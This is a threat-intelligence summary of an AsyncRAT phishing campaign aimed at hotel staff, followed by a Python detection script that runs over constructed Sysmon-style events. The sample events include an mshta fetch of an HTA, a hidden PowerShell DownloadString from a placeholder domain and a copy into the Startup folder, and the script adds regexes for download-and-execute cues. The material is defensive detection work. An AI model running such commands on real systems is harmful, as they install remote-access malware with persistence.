AsyncRAT Phishing Campaign Targeting Hotel Staff
ID: f05562d7-940b-5b8a-aee9-4a0cee06583a
STIX ID: report--f05562d7-940b-5b8a-aee9-4a0cee06583a
Feed Name: WatchGuard Secplicity Blog
WatchGuard observed a phishing campaign targeting hospitality staff that lures victims with a fake booking cancellation and a link to a purported guest review. The link leads to a Cloudflare-protected phishing page that only delivers the payload when the visitor appears to be running Windows. Victims are socially engineered into pressing keyboard shortcuts that paste and run clipboard contents, which launches an HTA through mshta; the HTA contains obfuscated VBScript that downloads two PowerShell payloads disguised as .mp4 files. One payload loads AsyncRAT in memory via .NET reflection; the other installs a persistence batch file in the Startup folder that re-downloads the malware, giving the operators remote access and re-infection after reboot. The report lists the phishing domain and several file hashes as IOCs and highlights the campaign's use of living-off-the-land binaries (mshta, PowerShell) to evade signature-based defenses.
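The summary describes a chain a defender can look for in endpoint telemetry: mshta spawning PowerShell, PowerShell fetching a script whose URL ends in a media extension, and something being dropped into the per-user Startup folder. The following added example (not code from the WatchGuard report) runs three such checks over constructed, Sysmon-style process-creation events. The domain, paths and PIDs are placeholders invented for the example; the report's actual IOCs are not reproduced here.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events in Sysmon Event ID 1 style (pid, parent pid,
# image path, command line). None of these values come from the report;
# the domain is a deliberately invalid placeholder.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4120, "ppid": 3300, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5012, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://EXAMPLE-PHISHING-DOMAIN.invalid/review.hta"},
    {"pid": 5100, "ppid": 5012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadString('https://EXAMPLE-PHISHING-DOMAIN.invalid/clip.mp4')\""},
    {"pid": 5200, "ppid": 5100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c copy update.bat "C:\Users\guest\AppData\Roaming\Microsoft'
                r'\Windows\Start Menu\Programs\Startup\update.bat"'},
    # Benign PowerShell launched from Explorer; must not be flagged.
    {"pid": 6000, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Get-ChildItem C:\Temp"},
]

# A URL whose path ends in a media extension: the report's payloads were
# PowerShell disguised as .mp4, so a script host fetching "media" is suspicious.
MEDIA_URL_RE = re.compile(r"https?://\S+\.(?:mp4|mp3|jpg|png)\b", re.I)
# Cues that the fetched content is executed rather than merely saved.
EXEC_CUE_RE = re.compile(r"downloadstring|iex|invoke-expression|net\.webclient|-e[nc]\b", re.I)
# Anything written under the per-user Startup folder with a script-like extension.
STARTUP_RE = re.compile(r'\\Start Menu\\Programs\\Startup\\[^"\s]*\.(?:bat|cmd|vbs|lnk)', re.I)


def _basename(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) pairs for events matching the chain in the report."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[Tuple[str, int]] = []
    for e in events:
        name = _basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = _basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]

        # Rule 1: LOLBin chain, mshta.exe as the direct parent of PowerShell.
        if name in {"powershell.exe", "pwsh.exe"} and parent_name == "mshta.exe":
            hits.append(("mshta_spawns_powershell", e["pid"]))

        # Rule 2: PowerShell fetching a "media" URL together with an execution cue.
        if name in {"powershell.exe", "pwsh.exe"} and MEDIA_URL_RE.search(cmd) \
                and EXEC_CUE_RE.search(cmd):
            hits.append(("powershell_fetches_media_named_script", e["pid"]))

        # Rule 3: persistence via a script dropped into the Startup folder.
        if STARTUP_RE.search(cmd):
            hits.append(("startup_batch_persistence", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Each rule alone is noisy in some environments (admin scripts do copy files into Startup), so in practice the three signals are best correlated on the same process tree within a short window; the parent/child lookup in `detect` is the minimal building block for that. Real deployments would read the events from a SIEM or EDR export rather than the embedded list.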
